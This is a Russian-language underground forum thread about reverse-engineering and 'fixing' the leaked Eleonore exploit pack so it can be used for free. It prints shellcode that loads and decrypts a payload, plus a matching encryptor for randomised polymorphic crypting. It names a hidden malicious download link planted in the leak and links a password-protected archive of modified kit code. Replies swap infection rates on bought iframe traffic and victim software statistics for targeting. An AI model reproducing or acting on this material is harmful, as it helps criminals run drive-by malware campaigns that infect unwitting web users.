интимный дневник Элеоноры :)

[KraZz]

очередная история реверса Условие лицензии – пишу, как обычно на правах нуба..
Все началось с того что на аверских трекерах постоянно маячит парочка Элеонора и Зевс, прям как адам и ева(неразлучные грешники) %)))
Решил познакомицца с это Элеонорой, и начал с нашумевшей темы
http://xss.pro/index.php?topic=18091
первое на что обратил внимание это на несколько постов - два про шелл-кодес и один, про то, что чел(сливший в паблик пак) не имеет никакого отношения к гуано-кодесу
Вообще концепция шелла состоит в том, чтобы делать загрузки на чужом трафе(параллельно), по сути жертве грузиццо сразу целый зоопарк
!предположим!, что "сливший" туда впатчил качка и вот здесь мы заюзаем "его" идею и не только "починим" пак, но и "улучшим" его
Посмотрев на код сразу видно что пак очень слабенький на пробив и это даже без тестов сразу сказать можно(обычный юзер отключив зло js и заюзав простенький локальный прокси.. и связка идет лесом(тут даже AV нах не нужен!)) пробив будет равен 0(5-10 это те, кто как раз не знает как выключить js(утрировано)), но если иметь траф, где юзверей насильно заставляют включить js итд. тут пробив будет 80-90(10-20 баги связки) при условии что связка не палица, но судя тупо по трекеру .!..
Вот такую я формулу вывел за день реверса, (без тестов) как оценивать, пробив связки – ИМХО
Сталобыть пробив, зависит от качества трафа(а именно, где у юзверей все включено!) и качества связки на бажность(и вот это и есть важный фактор для всех связок) – ИМХО (я кстати эти эксплоиты что там есть, даже протестировал на пробив(баги))
сделал значит, реверс этого шелл-кода и действительно есть там зловред в виде линка
http://theyaredead.net/last/cache.php
для тех, кто в танке советую начать чтиво отсюда
http://wasm.ru/forum/viewtopic.php/viewtopic.php?pid=288731
если посмотреть на шелл-код, то можно сразу заметить, что он адин в адин, такой же как в
http://www.opensc.ws/trojan-malware-releas...o-need-buy.html - SPack Lite
а вот что добавлено (часть, которая нам интересна)

PUSH 0
PUSH 80h
PUSH 3
PUSH 0
PUSH 3
PUSH 0C0000000h
PUSH ESI
MOV EAX, 7C0017A5h; hash: CreateFileA
CALL DWORD PTR SS:[EBP+18h]; kernel32.CreateFileA
MOV DWORD PTR SS:[EBP+4h],EAX
PUSH 4
PUSH 1000h
PUSH 80000h
PUSH 0
MOV EAX, 91AFCA54h; hash: VirtualAlloc
CALL DWORD PTR SS:[EBP+18h]; kernel32.VirtualAlloc
MOV DWORD PTR SS:[EBP+0Ch],EAX
PUSH EAX
PUSH 0
LEA ECX,DWORD PTR SS:[EBP+8h]
PUSH ECX
PUSH 80000h
PUSH EAX
PUSH DWORD PTR SS:[EBP+4h]
MOV EAX,10FA6516h; hash: ReadFile  
CALL DWORD PTR SS:[EBP+18h]; kernel32.ReadFile
POP EDI
MOV EDX,DWORD PTR DS:[EDI]
ADD EDI,4h
MOV ECX,DWORD PTR SS:[EBP+8h]
SUB ECX,4h
CALL Decrypt
[....]
Decrypt:
XOR EAX,EAX
MOV AL,BYTE PTR DS:[EDI]
ROR AL,CL
XOR AL,CL
NOT AL
XOR AL,CH
XOR AL,DL
XOR AL,DH
ROL AL,CL
ADD AL,CL
ADD AL,CH
ADD AL,DL
ADD AL,DH
ROR AL,CL
SUB AL,CL
SUB AL,CH
NOT AL
SUB AL,DL
SUB AL,DH
ROL AL,CL
ROL EDX,CL
BSWAP EDX
MOV BYTE PTR DS:[EDI],AL
INC EDI
DEC ECX
JNZ SHORT Decrypt
RETN

В самом шелле, крипт exe сделан не нубом - это без вариантов
но есть один недостаток, а именно при вызове функции VirtualAlloc размер задается 80000h = ~500kb
сталобыть мы пофиксим эту потенциальную багу с помощью вызова функции GetFileSize
+ удалим(на выбор) ExitThread "на том конце роняет.."
и если посмотреть на код, то можно увидеть функцию декрипта, хм.. значит, мы можем рандомно на сервере криптовать двордом exe, а потом его декриптовать на компе жертвы, но это не есть конечное условие мы еще функцию декрипта рандомить в шелле будем гы-гы, шучу конечно же %)))(ниже "подробнее" ап этом)
для выдачи по бинарному шеллу надо создать отдельный php-файл, назвать как-нить типа page.php
вообщем я все файлы с кодом в один архив поместил ну естественно кому эта тема интересна обязательно читаем README (ЗЫ: гуру там для себя ничего нового не найдет!)
http://demonteam.narod.ru/download/fix_ep.rar
PASS: 666
Теперь я пожалуй напишу, почему я выбрал именно такой подход пхп кода, а именно "эмуляцию" asm-кода
Дело в том, что такой код можно юзать для рандомного генерирования алгоритмов(+eval)
Это проще, чем сделать алгоритм(криптора) в виде одной пхп функции, тут можно рандомно все перестанавливать
Короче чтобы проще объяснить надо пойти от обратного, а именно от функи Decrypt
В ней юзаются асм-команды
XOR обратная XOR
ADD обратная SUB
ROR обратная ROL
NOT обратная NOT
И так далее..
Нам надо сделать все тоже самое, только в обратном порядке

Encrypt:
INC ECX
DEC EDI
MOV AL,BYTE PTR DS:[EDI]
BSWAP EDX
ROR EDX,CL
ROR AL,CL
ADD AL,DH
ADD AL,DL
NOT AL
ADD AL,CH
ADD AL,CL
ROL AL,CL
SUB AL,DH
SUB AL,DL
SUB AL,CH
SUB AL,CL
ROR AL,CL
XOR AL,DH
XOR AL,DL
XOR AL,CH
NOT AL
XOR AL,CL
ROL AL,CL
MOV BYTE PTR DS:[EDI],AL
cmp ecx,26h
JNZ SHORT Encrypt
RETN

ЗЫЫ: просто сравните их рядом с друг другом(Decrypt и Encrypt) и все сразу увидите..
И теперь далее все просто меняем местами в рандомном порядке и имеем постоянно разный алго криптора-декриптора
Ну сталобыть все . надеюсь, может кому-то это пригодицца, то что я написал

 

[WennY]

обычный юзер отключив зло js и заюзав простенький локальный прокси.. и связка идет лесом(

Немного не понял... Понятно, что если отключить js, то добрая половина сплойтов не сработает. Но ты так говоришь, как буд-то остальным связкам до фени на отрубленную яву и что они и так замочат всех. Ты имеешь в виду кроссплатформенные сплойты (флеш, пдф etc) или что-то иное, что позволит с оффнутой явой грузить сплойты в том же режиме? Я что-то не догоняю...

 

[Exmanoize]

да, тоже чет не вкурил по поводу отключения js.
ТС, вообще то всех боф сплойтах используются либо JS либо VBS скрипт и без этого никак.(не считая пдф и флеш и т.п.)
а то что отключен JS... хм...так это может у 1% трафа и отключен или у ботов, ты сам попробуй в сети полазить с отключенным JS,думаю надолго не хватит.
хотя все таки спасибо ТС, я на досуге соберу статистику по отключенным JS в траффе, если понадобится то и сделаю чтоб юзеры включали JS)

 

[WennY]

С другой стороны он прав в некотором. У тебя проверки на версии pdf идут на яваскрипте, т.е. если оный будет офф, то пдф не будет выдан вообще. А это не есть хорошо. В данном случае уместно будет сделать дефолтную выдачу какого-нибудь сплойта, если вдруг яваскрипт определение не дало ничего (если ты этого конечно не сделал в последних версиях)

 

[el-]

WennY, с другой стороны если не ходить в инет вообще, то никакой сплоит выдан не будет, поэтому надо рассылать болванки с пдф сплоентом почтой по всем соседям ... а если честно, то надо просто положить на всяческих "ботов" без кук, без яваскрипта ... в принципе можно даже положить на тех кто ходит под проксями, ведь большая часть это боты ... ну или параноидально настроенные юзеры, которые интереса не представляют.

 

[Mr.Di]

херовенький обзорчик, начали за здравие, кончили за упокой. какие 80-90%. что за хрень несете

 

[KraZz]

я на досуге соберу статистику по отключенным JS в траффе

С 10к аслишь стату снять и здесь запостить?
ЗЫ: Только чтобы все ЧЕСТНО было, ага!?

P. S.
То, что вы здесь цитируете и обсуждаете(нах), было написано чич-то для фона(для смены менталитета)
Это раздел реверса, и смысл написанного в том, как сделать фикс выложенного в паблик сабжа и заюзать его бесплатно
Все это писалось для студентов, у которых нет денег на хорошую связку, так сказать для бу-га-га старта!
Пишу, как умею. Если кто умеет лучше? , внимательно слушаю: «как надо правильно писать "обзоры"»

Чет подумал сейчас, и решил запостить
код из SPack Lite

function unescape($shcode){
$generate = NULL;
$source = strtoupper(bin2hex($shcode));
$g = round(strlen($source)/4);
if($g!=(strlen($source)/4)) $source.="00";
for($i=0;$i<strlen($source);$i+=4)
$generate.="%u".substr($source,$i+2,2).substr($source,$i,2);
return $generate;
}

код из Eleonore exploits pack

function unescape($s)
{
$out = "";
$res=strtoupper(bin2hex($s));
$g = round(strlen($res)/4);
if ($g != (strlen($res)/4)) $res.="00";
for ($i=0; $i<strlen($res);$i+=4)
$out.="%u".substr($res,$i+2,2).substr($res,$i,2);
return $out;
}

ЗЫЫ: я ведь тоже, умею гвозди в гроб забивать..

 

[el-]

KraZz, а че ты паникуешь то, есть человек есть мнение ... если на каждого обращать внимание, то никаких нервов не хватит... ну а вообще сделал статью, породил обсуждение - молодец, было бы лучше если бы на твой пост никто не ответил ?

насчет unescape, все у всех "одалживают" код в этом нет ничего удивительного

 

[KraZz]

Не-не, я не паникую. мну добрый

Просто, если DiFor написал про 80-90%, так объяснил бы, почему и че к чему начинающему ботоводу
Чем этот процент может быть снижен или увеличен
Я только рад за конструктив и пиздюля по делу, а так..

Я про процент писал, исходя из того что траф(windows) контролирую я, ну типа
http://wormarchive.com/wp-content/uploads/...archive.com.rar + гугл (опять же теоретически на правах нуба)

на покупном трафе, естес-но ппц каг ниже будет..
обзоры, которые делает Ar3s, отражают реальный процент - ИМХО

 

[Mr.Di]

насчет включенного/отключенного ЯС я хозэ, но вот вам стата по версиям флеша. снята с гугл аналита:

1. 10.0 r32 56 143 55,50 %
2. 10.0 r22 25 425 25,14 %
3. 10.0 r12 11 805 11,67 %
4. 9.0 r124 3 243 3,21 %
5. (not set) 1 635 1,62 %
6. 9.0 r115 921 0,91 %
7. 10.0 r2 895 0,88 %
8. 9.0 r47 151 0,15 %
9. 9.0 r45 138 0,14 %
10. 6.0 r88 121 0,12 %

Добавлено в [time]1257280187[/time]
ога, а те разборы что делаю я отражают хуету))) 80-90 не будет даже только на уязвимом трафе ибо кроме всего прочего на пробив влияет положение звезд на небе, фаза луны (при убывающей луне пробив ниже, при прибывающей) и стадия беременности носорога яшки в африке

 

[el-]

DiFor, ну конечено хуета ( извените ), на ифрейм трафе с въетнама нпример можно выжать 60% я такое видел, ну или турция например ... ну а вообще трафом человек может управлять, ведь по запросу download acrobat reader 7, делается 12к запросов в месяц, убрав и трафа шлак вы как раз получите свой высокий процент .. как бы было бы желание

 

[Одинокий Волк]

Чё тут все статистиками мерются вот я взял стату с рабочий связки с рабочего трафа:

Уникальных: 902
Один IP, без куков: 1166
Без куков: 28
Без JS: 128

Как бы ботов дохрена всё же, вот до отсекания ботов пробив у связки был якобы 6% а после проверки на ботов стал 16% поразительно оказывается паблик сплойты стали бить лучше когда считают правильно

 

[Fahrenheit]

и связка идет лесом(

В большенстве случаев хосты перенаправляются за счет редиректов и фреймов, закриптованных тем же ЯС, соответственно % хостов, дошедших до связки, с отключенным ЯС, очень мал.
Но, когда мы перенаправляем трафик на уровне вебсервера, проценты уже совсем другие.

Уникальных: 902

Уникальность IP+Cookie или еще доп. параметры, вроде разрешения экрана?

 

[lisa99]

стата по версиям флеша. снята с гугл аналита:

это опять-таки микс...-по странам.
но превалирование 10 r32 для меня неожиданно...придется менять планы, те. скрипты=\

 

[Mr.Di]

стата не совсем микс, более всего в стате преобладает ру. так что и россия наконец начала патчится)

 

[KraZz]

АП-АП-АП

проценты уже совсем другие.

ИМХО - траф можно создавать и с помощью приватных сетевых червей , там тоже проценты другие будут %))

P. S.
естественно я НЕ мог написать про проценты, больше чем заявляет сам автор %)))

Средний пробив на связке:
> на уса траффе: 5-15%
> на ру-снг траффе: 10-25%
* Пробив указывается приблизительный, может отличаться и зависит напрямую от вида и качества траффика.

И уж тем более, когда в обзоре сделан реальный тест

Первый тест на мое трафе. Ифрэйм, бизнес-эду тематики с преобладанием US
Трафика 829, загрузок 48, средний процент пробива 5,46%

Второй тест на трафе продавца. Ифрэйм, адалт тематики, с преобладанием US
Трафика 1702, загрузок 88, процент пробива 5.17%

Третий и четвертый тесты проводились уже на обновленной связке.
Траф идентичен второму тесту, т.е. ифрэйм, адалт тематики, с преобладанием US
Трафика 835, загрузок 81, процент пробива 9,70%
Как видим, налицо улучшение пробива.

Четвертый тест, для закрепления результата проводился на покупном ифрэйм трафике. MIX с преобладанием US DE GB TR IT.
Трафика 2404, загрузок 434, процент пробива 18,05%

Даже в страшном сне я себе не мог представить, что кто-то может подумать про такой процент.. (тут даже недавно селера какого-то нах послали за такой процент, ну епт же)
Я же писал исходя из процентов бажности самой связки
То есть, мне надо было написать «тут пробив будет 80-90(10-20 баги связки)из 5-15%», просто я процент НЕ стал писать, потому что думал, ЧТО ВСЕМ И ТАК ПОНЯТНО КАКОЙ ОН СО СЛОВ АВТОРА И ОБЗОРА Ar3s %)))
То есть, из-за багов в связке(ну там к примеру: файл уже залился на комп жертвы, но из-за кривого шелла, браузер юзера храбро пал, юзера такие действия насторожили и он..), процент пробива может ЕЩЕ МЕНЬШЕ стать
И в качестве подтверждения этих слов я и писал про функцию «ExitThread "на том конце роняет.."»
ЗЫ: и опять же, не надо путать этот процент с "отстуком лоадера"
Процент писался именно исходя из пропорции богов в связке! И речь шла именно о НИЗКОУРОВНЕВОМ ПРОГРАММИРОВАНИИ, раздел то епт про РЕВЕРС
Так что тут "бреда" какбэ совсем и нет, ага!?
надеюсь сейчас я хоть доходчиво объяснил, о каких процентах там я писал..

 

[TrueUser]

Так что тут "бреда" какбэ совсем и нет, ага!?
надеюсь сейчас я хоть доходчиво объяснил, о каких процентах там я писал..

Вот всегда бы так

 

[KraZz]

Ну, как обычно.. гуру здесь ничего нового не найдет!
И пишу естественно все на правах нуба
ЗЫ: я знаю, что написано ни о чем, но по-другому не умею
Просто решил попробовать в новом формате пробу пера %)) может кого улыбнет

Спойлер: 2

http://demonteam.narod.ru/ZlYr17BzUrN6q/h0k7g3uz.html

ЗЫ: помидоры и злая критика приветствуется, но товарищам в кожаных трусах с плетками запрещено появляцца на сцене!

 

[Mr.Di]

пардон, но метание с темы на тему не очень приятно читать

 

[KraZz]

Ну хз. по моим понятиям там нет метания с темы на тему(там все в тему) и это даже минимум(10-15%) того, на что надо обращать внимание для мода сплоита
Ну, или конкретнее напиши че не так, может действительно все так запущено СТРАШНО
Хз. вот я лично, когда читаю что-то - мне похер как написано, главное чтобы было написано то, что мне нужно, а там я уже разберусь что куда..